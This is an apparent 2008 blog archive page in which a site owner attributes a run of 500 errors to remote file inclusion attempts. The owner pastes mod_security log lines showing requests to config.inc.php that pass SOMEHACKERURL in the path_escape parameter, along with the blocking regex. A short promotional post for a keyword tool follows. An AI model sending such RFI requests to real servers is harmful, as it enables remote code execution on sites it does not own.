Archive for January, 2008

The reason for all those 500 errors…

We are being flooded by hack attempts. Here is an excerpt of the access logs:

[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:06 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:18:23 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “/support///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]
[Mon Jan 7 09:30:39 2008] [error] [client 69.93.20.XXX] mod_security: Access denied with code 503. Pattern match “=(\\\\.\\\\.|http|https|ftp)\\\\:” at REQUEST_URI [id “HG2007072020″][rev “1″] [msg “HG: libwww UA with RFI”] [severity “NOTICE”] [hostname “getyacg.com“] [uri “///config.inc.php?path_escape//////config.inc.php?path_escape=SOMEHACKERURL”]

It’s all coming from the same host, and I have a pretty good idea of what they are attempting… But I’m not sure if it’s an automated attack and I’m a random victim or it’s a personal attack against [YACG].

I will take care of this ASAP and let you guys now what this is all about…

Need keywords for your [YACG] sites? Free Keyword Tool

If you need keywords for your [YACG] sites, you might want to check this out.

http://busin3ss.name/free-keyword-tool

Have fun!